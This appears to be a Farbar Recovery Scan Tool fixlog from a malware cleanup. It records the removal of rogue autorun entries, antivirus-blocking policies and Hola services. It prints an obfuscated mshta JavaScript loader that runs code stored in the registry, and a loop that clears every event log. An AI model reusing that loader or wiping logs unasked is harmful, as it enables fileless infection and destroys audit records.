Fix result of Farbar Recovery Scan Tool (x64) Version: 15-03-2017
Ran by Admin (10-04-2017 23:37:04) Run:1
Running from C:\Users\Admin\Desktop
Loaded Profiles: Admin & Administrator (Available Profiles: Admin & Administrator)
Boot Mode: Normal
==============================================

fixlist content:
*****************
HKLM\...\Run: [hola] => C:\Program Files\Hola\app\hola.exe [2168416 2017-02-22] (Hola Networks Ltd.) <===== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\COMODO <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Avira <====== ATTENTION
HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore: [DisableSR/DisableConfig] <===== ATTENTION
HKU\S-1-5-21-2885170103-1010608853-939429740-1001\...\Run: [Orvhics] => regsvr32.exe C:\Users\Admin\AppData\Local\Orvhics\crjcewng.dll <===== ATTENTION
HKU\S-1-5-21-2885170103-1010608853-939429740-1001\...\Run: [YvghPack] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\Admin\AppData\Local\Ilbsoft\mhkforlr.dll <===== ATTENTION
HKU\S-1-5-21-2885170103-1010608853-939429740-1001\...\Run: [*atfxx<*>] => "C:\Users\Admin\AppData\Local\5427bc7\6663ade.bat" <===== ATTENTION (Value Name with invalid characters)
GroupPolicy: Restriction - Chrome <======= ATTENTION
C:\Users\Admin\AppData\Local\5427bc7
C:\Users\Admin\AppData\Local\Ilbsoft
C:\Users\Admin\AppData\Local\Orvhics
C:\Program Files\Hola
R2 hola_svc; C:\Program Files\Hola\app\hola_svc.exe [5622368 2017-02-22] (Hola Networks Ltd.) <==== ATTENTION
R2 hola_updater; C:\Program Files\Hola\app\hola_updater.exe [5618864 2016-08-31] (Hola Networks Ltd.) [File not signed] <==== ATTENTION
HKU\S-1-5-21-2885170103-1010608853-939429740-1001\Software\Classes\fa112f2: "C:\WINDOWS\system32\mshta.exe" "javascript:ROZV5mbH="3U";UL04=new ActiveXObject("WScript.Shell");mPuoi4="x1BpH";MnI2U=UL04.RegRead("HKCU\\software\\pqsrp\\jlcjj");h6cv2m="QVU";eval(MnI2U);qQe8e3ant="OPCYXMkS";" <===== ATTENTION
ATTENTION: System Restore is disabled
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
2017-04-09 13:55 - 2016-07-08 21:13 - 00000000 ____D C:\Temp
2017-04-04 10:30 - 2016-07-16 07:36 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-04-09 16:54 - 2017-04-09 16:54 - 0152576 _____ () C:\Users\Admin\AppData\Local\Temp\ext1019676610510632217.dll
2017-03-31 00:15 - 2017-03-31 00:15 - 0152576 _____ () C:\Users\Admin\AppData\Local\Temp\ext3828717390359039331.dll
2017-04-09 14:21 - 2017-04-09 14:22 - 0152576 _____ () C:\Users\Admin\AppData\Local\Temp\ext7308831775991178666.dll
2017-04-09 16:54 - 2017-04-09 16:54 - 00152576 _____ () C:\Users\Admin\AppData\Local\Temp\ext1019676610510632217.dll
FirewallRules: [{0BD60C3F-28EE-4F60-8DCB-A85E310B63F0}] => (Allow) C:\Users\Admin\AppData\Local\Temp\andy-x64\Setup.exe
FirewallRules: [{0C3720BF-0AA7-49C2-8F52-3BC27DF53552}] => (Allow) C:\Users\Admin\AppData\Local\Temp\andy-x64\Setup.exe
FirewallRules: [{F0032B48-523A-4821-8BEF-92E8592327F3}] => (Allow) C:\Users\Admin\AppData\Local\Temp\MPCOnline\MPCDownload.exe
FirewallRules: [{9ED913E4-C72A-41AE-8BB0-0A1C662F15A5}] => (Allow) C:\Users\Admin\AppData\Local\Temp\MPCOnline\MPCDownload.exe
(Lingobit Technologies & RePack by Dodakaedr) C:\Users\Admin\AppData\Local\Ilbsoft\tmpF873.exe
HKU\S-1-5-21-2885170103-1010608853-939429740-1001\...\Run: [Ilbsoft] => C:\Users\Admin\AppData\Local\Ilbsoft\tmpF873.exe [270336 2017-04-09] (Lingobit Technologies & RePack by Dodakaedr)
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: ipconfig /flushdns
CMD: netsh winsock reset catalog
CMD: netsh int ip reset C:\resettcpip.txt
CMD: FOR /F "usebackq delims==" %i IN (`wevtutil el`) DO wevtutil cl "%i"
CMD: Bitsadmin /Reset /Allusers
EMPTYTEMP:
Reboot:
*****************

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\hola => value removed successfully
HKLM Group Policy restriction on software: C:\Program Files\COMODO <====== ATTENTION => restored successfully
HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <====== ATTENTION => restored successfully
HKLM Group Policy restriction on software: C:\Program Files\Avira <====== ATTENTION => restored successfully
HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore => key removed successfully
HKU\S-1-5-21-2885170103-1010608853-939429740-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Orvhics => value not found.
HKU\S-1-5-21-2885170103-1010608853-939429740-1001\Software\Microsoft\Windows\CurrentVersion\Run\\YvghPack => value removed successfully
HKU\S-1-5-21-2885170103-1010608853-939429740-1001\Software\Microsoft\Windows\CurrentVersion\Run\\*atfxx<*> => value removed successfully
C:\WINDOWS\system32\GroupPolicy\Machine => moved successfully
C:\WINDOWS\system32\GroupPolicy\GPT.ini => moved successfully
C:\Users\Admin\AppData\Local\5427bc7 => moved successfully
C:\Users\Admin\AppData\Local\Ilbsoft => moved successfully
C:\Users\Admin\AppData\Local\Orvhics => moved successfully
"C:\Program Files\Hola" folder move:
Could not move "C:\Program Files\Hola" => Scheduled to move on reboot.
hola_svc => Unable to stop service.
HKLM\System\CurrentControlSet\Services\hola_svc => key removed successfully
hola_svc => service removed successfully
hola_updater => Unable to stop service.
HKLM\System\CurrentControlSet\Services\hola_updater => key removed successfully
hola_updater => service removed successfully
HKU\S-1-5-21-2885170103-1010608853-939429740-1001\Software\Classes\fa112f2 => key removed successfully
ATTENTION: System Restore is disabled => Error: No automatic fix found for this entry.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avast => key removed successfully
HKCR\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => key not found.
C:\Temp => moved successfully
C:\WINDOWS\CbsTemp => moved successfully
C:\Users\Admin\AppData\Local\Temp\ext1019676610510632217.dll => moved successfully
C:\Users\Admin\AppData\Local\Temp\ext3828717390359039331.dll => moved successfully
C:\Users\Admin\AppData\Local\Temp\ext7308831775991178666.dll => moved successfully
"C:\Users\Admin\AppData\Local\Temp\ext1019676610510632217.dll" => not found.
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{0BD60C3F-28EE-4F60-8DCB-A85E310B63F0} => value removed successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{0C3720BF-0AA7-49C2-8F52-3BC27DF53552} => value removed successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{F0032B48-523A-4821-8BEF-92E8592327F3} => value removed successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{9ED913E4-C72A-41AE-8BB0-0A1C662F15A5} => value removed successfully
[8660] C:\Users\Admin\AppData\Local\Ilbsoft\tmpF873.exe => process closed successfully.
HKU\S-1-5-21-2885170103-1010608853-939429740-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Ilbsoft => value removed successfully

========= netsh advfirewall reset =========

An error occurred while attempting to contact the Windows Firewall service. Make sure that the service is running and try your request again.

========= End of CMD: =========

========= netsh advfirewall set allprofiles state ON =========

An error occurred while attempting to contact the Windows Firewall service. Make sure that the service is running and try your request again.

========= End of CMD: =========

========= ipconfig /flushdns =========

Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========= End of CMD: =========

========= netsh winsock reset catalog =========

Sucessfully reset the Winsock Catalog.
You must restart the computer in order to complete the reset.

========= End of CMD: =========

========= netsh int ip reset C:\resettcpip.txt =========

Resetting Global, OK!
Resetting Interface, OK!
Resetting Unicast Address, OK!
Resetting Neighbor, OK!
Resetting Path, OK!
Resetting , failed.
Access is denied.

Resetting , OK!
Restart the computer to complete this action.

========= End of CMD: =========

========= FOR /F "usebackq delims==" %i IN (`wevtutil el`) DO wevtutil cl "%i" =========

Failed to clear log Microsoft-Windows-LiveId/Analytic. Access is denied.
Failed to clear log Microsoft-Windows-LiveId/Operational. Access is denied.
Failed to clear log Microsoft-Windows-USBVideo/Analytic. The instance name passed was not recognized as valid by a WMI data provider.

========= End of CMD: =========

========= Bitsadmin /Reset /Allusers =========

BITSADMIN version 3.0
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

{01B20EBD-9F83-4E82-BF76-244031E84488} canceled.
1 out of 1 jobs canceled.

========= End of CMD: =========

=========== EmptyTemp: ==========

BITS transfer queue => 32768 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 314005072 B
Java, Flash, Steam htmlcache => 37147935 B
Windows/system/drivers => 280241719 B
Edge => 2256309 B
Chrome => 579626355 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 128 B
LocalService => 124104 B
NetworkService => 1007908 B
Admin => 532043285 B
Administrator => 103733794 B

RecycleBin => 757341397 B
EmptyTemp: => 2.4 GB temporary data Removed.

================================

Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 10-04-2017 23:46:43)

C:\Program Files\Hola => Is moved successfully

==== End of Fixlog 23:46:43 ====